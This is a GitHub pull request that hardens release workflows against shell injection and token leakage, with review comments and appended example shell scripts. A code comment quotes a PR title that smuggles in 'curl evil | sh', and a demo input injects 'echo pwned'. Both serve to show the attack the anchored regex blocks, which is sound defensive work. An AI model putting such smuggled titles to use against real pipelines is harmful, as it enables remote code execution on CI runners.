fix(ci): Harden workflows against shell injection and fix quoting issues#239
- check-release-condition.yml: Replace ${{ }} expression interpolation
in shell scripts with env-based variable passing to prevent command
injection. Strengthen version parser with anchored regex. Migrate
deprecated set-output to $GITHUB_OUTPUT. Use grep -Fq for exact
string matching in CHANGELOG check.
- update_changelog.sh: Fix typo in git-chglog command (missing space)
that broke the existing-tag code path. Add proper quoting for all
variable references.
- version-tag.yml: Suppress stderr on git remote set-url to prevent
token leakage in error logs.
Pull request overview
This PR hardens the release-related GitHub Actions workflows and the changelog update script by fixing quoting issues, reducing opportunities for shell injection, and updating deprecated workflow output patterns.
Changes:
- Harden check-release-condition parsing/outputs (anchored version matching, $GITHUB_OUTPUT, env-based comparisons) and make the CHANGELOG check use fixed-string matching.
- Fix a broken git-chglog invocation path and improve shell quoting in update_changelog.sh.
- Update version-tag workflow to reduce the chance of token leakage in error logs.
Reviewed changes
Copilot reviewed 3 out of 3 changed files in this pull request and generated 2 comments.
| File | Description |
|---|---|
| .github/workflows/version-tag.yml | Adds job gating and suppresses stderr for remote URL update when pushing major/minor tags. |
| .github/workflows/check-release-condition.yml | Tightens release title parsing, migrates from set-output to $GITHUB_OUTPUT, and hardens comparisons/grep usage. |
| .github/scripts/update_changelog.sh | Fixes git-chglog command typo and adds consistent variable quoting. |
| runs-on: ubuntu-latest | ||
| if: github.actor == github.repository_owner |
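Review bot: the gate `if: github.actor == github.repository_owner` compares a user login against the repository owner login, so on an organization-owned repository it can never be true and every tag push silently skips the job; if the intent is "only the owner of this personal repository", state that in a comment next to the condition, and if the repository may move under an organization, compare against an explicit login instead. Note also that the condition keys off the pushing identity only, so it does nothing to distinguish a tag pushed by the owner's own automation tokens from an interactive push.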
The new job-level condition if: github.actor == github.repository_owner is a behavior change that will skip this workflow for tag pushes made by non-owner maintainers or automation (e.g., github-actions[bot]). If major/minor tag updates are expected to run for tag pushes created by CI or by collaborators with tag permissions, consider broadening/adjusting the condition (or documenting why only the repository owner should be allowed).
This is intentional. In this repository, only the repository owner pushes version tags. The same restriction pattern is already applied to the release-candidate workflow.
| - name: tag | ||
| run: | | ||
| git remote set-url origin https://${{ secrets.GITHUB_TOKEN }}@github.com/${GITHUB_REPOSITORY}.git | ||
| git remote set-url origin "https://${{ secrets.GITHUB_TOKEN }}@github.com/${GITHUB_REPOSITORY}.git" 2>/dev/null |
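Review bot: both lines of this hunk still interpolate `${{ secrets.GITHUB_TOKEN }}` directly into the `run:` script text, the same expression-in-shell pattern this PR removes from check-release-condition.yml, and `git remote set-url` then stores the token-bearing URL in plaintext in `.git/config` for the rest of the job, so `2>/dev/null` on the second line only hides the error path, not the credential. Prefer the authentication actions/checkout already configures when `persist-credentials` is left at its default (an `http.extraheader` on the checkout), or pass the token through an `env:` entry and reference `$GITHUB_TOKEN` from the script so the value never appears in the script source or the remote URL.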
Redirecting git remote set-url stderr to /dev/null prevents potential token leakage, but it also removes actionable diagnostics if the command fails (the step will just error with no context). A safer approach is to avoid embedding the token in the remote URL at all (actions/checkout typically already configures authenticated remotes), or capture stderr and re-emit a sanitized failure message without the URL/token.
| git remote set-url origin "https://${{ secrets.GITHUB_TOKEN }}@github.com/${GITHUB_REPOSITORY}.git" 2>/dev/null |
Removed the stderr suppression. GITHUB_TOKEN is scoped to the job and expires on completion, so token leakage in error logs is not a practical risk. Keeping diagnostic output is more valuable.
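As an added example of the second alternative the review comment above mentions (capture stderr and re-emit a sanitized failure message), and not code from this repository: a small POSIX sh wrapper that keeps git's diagnostics in the job log but with the token masked. The token value and the failing command below are constructed stand-ins, and the names run_redacted and redact are chosen here, not taken from the workflow.

```shell
#!/bin/sh
# Added example, not the repository's own code: instead of discarding stderr
# with 2>/dev/null (and losing the reason a step failed), run the command,
# capture its stderr, and re-emit it with the token replaced. The token is
# handed to awk through the environment so none of its characters are ever
# parsed as a regex or as an awk -v escape sequence.
set -u

# redact SECRET -> filter: copies stdin to stdout with every literal
# occurrence of SECRET replaced by ***. An empty SECRET passes text through.
redact() {
  REDACT_SECRET=$1 awk '
    BEGIN { s = ENVIRON["REDACT_SECRET"]; n = length(s) }
    {
      if (n == 0) { print; next }
      line = $0; out = ""
      while ((i = index(line, s)) > 0) {
        out = out substr(line, 1, i - 1) "***"
        line = substr(line, i + n)
      }
      print out line
    }'
}

# run_redacted SECRET CMD [ARGS...] -> runs CMD with its stderr captured to a
# temporary file, writes that stderr (redacted) to our own stderr, and returns
# the command's exit status, so a failing step still explains itself.
run_redacted() {
  secret=$1
  shift
  errfile=$(mktemp)
  if "$@" 2>"$errfile"; then status=0; else status=$?; fi
  redact "$secret" <"$errfile" >&2
  rm -f "$errfile"
  return "$status"
}

# Demo with a constructed token and a constructed failing command standing in
# for git remote set-url / git push (the message shape is git's, the values are not real).
demo() {
  token=ghp_EXAMPLEtoken0123456789   # constructed, not a real credential
  run_redacted "$token" sh -c \
    "echo 'fatal: unable to access https://$token@github.com/o/r.git' >&2; exit 128" \
    || echo "step failed with status $?, token not shown above"
}
demo
```

The redaction is a literal string search over ENVIRON, so it behaves the same for tokens containing characters that would be special to sed or to an awk -v assignment, and an empty secret (for example an unset variable) degrades to a plain pass-through rather than masking nothing or everything.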
Summary

- check-release-condition.yml: Replace ${{ }} expression interpolation in shell scripts with env-based variable passing. Strengthen the version parser with anchored regex (^...$). Migrate deprecated set-output to $GITHUB_OUTPUT. Use grep -Fq for exact fixed-string matching in the CHANGELOG check.
- update_changelog.sh: Fix typo in git-chglog command (missing space on L18) that broke the existing-tag regeneration path. Add proper quoting for all variable references.
- version-tag.yml: Suppress stderr on git remote set-url to prevent token leakage in error logs.

Backward compatibility verification

All 18 historical release PR titles (from release v0.8.0 through release: v0.25.0) were tested against both the old and new grep/sed patterns. Every title produces identical PASS results with both patterns, confirming no regression in version parsing.

Other changes are strictly safe:

- set-output → $GITHUB_OUTPUT: Standard migration, set-output is already deprecated by GitHub.
- release-candidate.yaml.
- grep -Fq: Stricter (fixed-string) matching only eliminates false positives.
- git-chglog typo fix: Restores a broken code path (existing-tag regeneration).

Test plan

- Open a release PR titled release: v0.25.0 and verify the check-release-condition workflow passes
- update_changelog.sh runs without errors in the release-candidate workflow
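The env-based passing, anchored regex, $GITHUB_OUTPUT and grep -Fq changes listed in the PR description and in the Summary above, put together as an added, runnable example; this is not the repository's own check-release-condition script. The title formats (release v1.2.3 and release: v1.2.3) and the CHANGELOG heading format (## v1.2.3) are assumptions based on the titles quoted in this PR, as are the output names is_release and version and the variable names PR_TITLE and CHANGELOG_PATH, which the workflow would supply through an env: block rather than by writing the title into the script.

```shell
#!/bin/sh
# Added example, not the repository's own workflow code: a release-condition
# check in which every untrusted value (PR title, CHANGELOG path) enters through
# the environment instead of ${{ }} interpolation into shell source. The title
# regex, the "## vX.Y.Z" CHANGELOG heading and the output names are assumptions.
set -u

# Anchored pattern: the whole title must match. Without ^...$, a title such as
# 'release: v0.25.0"; curl evil | sh' would still match on its prefix.
RELEASE_TITLE_RE='^release:? v[0-9]+\.[0-9]+\.[0-9]+$'

# parse_release_version TITLE -> prints the version (e.g. 0.25.0) and returns 0,
# or returns 1 if the title is not a well-formed release title.
parse_release_version() {
  title=$1
  nl='
'
  # grep matches line by line, so a multi-line value could smuggle a valid
  # line past the anchors; reject anything containing a newline outright.
  case $title in *"$nl"*) return 1 ;; esac
  printf '%s\n' "$title" | grep -Eq "$RELEASE_TITLE_RE" || return 1
  printf '%s\n' "$title" | sed 's/^release:* v//'
}

# changelog_has_version VERSION FILE -> 0 if FILE contains a heading for that
# exact version. -F makes the needle a literal string, so the dots in the
# version cannot act as regex wildcards ("v0.25.0" no longer matches "v0x25y0").
changelog_has_version() {
  grep -Fq -- "## v$1" "$2"
}

# write_output NAME VALUE -> appends name=value to the file named by
# $GITHUB_OUTPUT, the replacement for the deprecated ::set-output command.
write_output() {
  printf '%s=%s\n' "$1" "$2" >> "${GITHUB_OUTPUT:?GITHUB_OUTPUT is not set}"
}

# check_release_condition reads PR_TITLE and CHANGELOG_PATH from the
# environment, as a workflow step would supply them with an env: block.
# Returns 0 and writes is_release=true plus version=... when the PR is a
# release PR whose version is present in the CHANGELOG; otherwise writes
# is_release=false and returns 1.
check_release_condition() {
  version=$(parse_release_version "${PR_TITLE:-}") || {
    write_output is_release false
    return 1
  }
  changelog_has_version "$version" "${CHANGELOG_PATH:-CHANGELOG.md}" || {
    write_output is_release false
    return 1
  }
  write_output is_release true
  write_output version "$version"
}

# Stand-alone demo with a constructed CHANGELOG and a constructed output file.
demo() {
  tmp=$(mktemp -d)
  printf '## v0.25.0\n- changes\n## v0.24.0\n' > "$tmp/CHANGELOG.md"
  GITHUB_OUTPUT=$tmp/output
  CHANGELOG_PATH=$tmp/CHANGELOG.md
  PR_TITLE='release: v0.25.0'
  check_release_condition && echo "release PR accepted"
  # An injection-style title is rejected by the anchored regex and, because it
  # arrived through a variable, was never parsed as shell.
  PR_TITLE='release: v0.25.0"; echo pwned; "'
  check_release_condition || echo "rejected: $PR_TITLE"
  cat "$tmp/output"
  rm -rf "$tmp"
}
demo
```

In the workflow the step would carry env: PR_TITLE: ${{ github.event.pull_request.title }} and call the script from a plain run: line; the runner expands the expression into the process environment, never into shell source, so a hostile title can at most fail the regex.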